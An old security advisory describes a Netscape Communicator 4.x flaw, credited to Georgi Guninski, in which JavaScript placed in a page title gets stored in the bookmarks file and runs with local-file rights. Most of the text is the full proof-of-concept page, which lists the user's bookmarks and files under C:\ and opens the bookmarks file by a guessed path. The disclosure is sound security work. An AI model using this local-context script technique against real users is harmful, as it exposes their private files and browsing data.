COMMAND

    Netscape (javascript)

SYSTEMS AFFECTED

    Netscape Communicator 4.x

PROBLEM

    Georgi  Guninski  found  following.   There  is  a security bug in
    Netscape  Communicator  4.51  Win95,  4.07  Linux  (guess  all 4.x
    versions are affected)  in the way  they handle special  bookmarks
    with JavaScript code  in the title.   If you enclose  a JavaScript
    code with <SCRIPT> tags in the <TITLE> tag and bookmark that page,
    the JavaScript code is written in the local bookmarks file.   Then
    when the bookmarks file is  open, the JavaScript code is  executed
    in the security context of a local file - the bookmarks file.  The
    bookmarks file may be open by a script, probably a server redirect
    or by the user.  The bookmarks file name must be known, but it  is
    easily  guessed  for  most  dialup  users.   Vulnerabilities  are:
    reading  user's  bookmarks,  browsing  local  directories, reading
    local files (works fine  on Linux, probably possible  on Windows).
    Demonstration is available at:

        http://www.nat.bg/~joro/book2.html

    Source follows:

    <HTML><HEAD>
    <TITLE>
    <SCRIPT>
    alert('Bookmarks got control');


    s='Here are some bookmarks: \n';
    for(i=1;i<7;i++)
     s += document.links[i]+'\n';
    alert(s);

    dirToRead='wysiwyg://2/file://c:/';
    a=window.open(dirToRead);
    s='Here are some files in C:\\ :\n';
    for(i=1;i<7;i++)
     s += a.document.links[i]+'\n';
    a.close();
    alert(s);

    </SCRIPT>
    </TITLE></HEAD>
    <BODY>
    <hr WIDTH="100%">
    <br>To test it:
    <br>1) Bookmark this page.
    <br>2) Close all NC windows and restart NC.
    <br>3) Open bookmarks file (change the filename in the field below if needed
    and click "Open bookmarks", or use File| Open Page... )
    <br>
    <hr WIDTH="100%">

    <FORM>
    Enter the file name of your bookmarks file:
    <INPUT TYPE=TEXT SIZE=70 VALUE='c:\Program Files\Netscape\Users\default\bookmark.htm'>
    </FORM>

    <SCRIPT>
    function openBookmarks() {

    /* bmFile='c:\\Program Files\\Netscape\\Users\\default\\bookmark.htm'; */
     a=window.open('wysiwyg://1/file:///'+document.forms[0].elements[0].value);
    }
    </SCRIPT>

    <A HREF="javascript:openBookmarks()">Open bookmarks</A>
    </BODY>
    <hr WIDTH="100%">
    <A HREF="http://www.nat.bg/~joro">Go to Georgi Guninski's home page</A>
    </HTML>

SOLUTION

    Disable JavaScript or do not bookmark untrusted pages.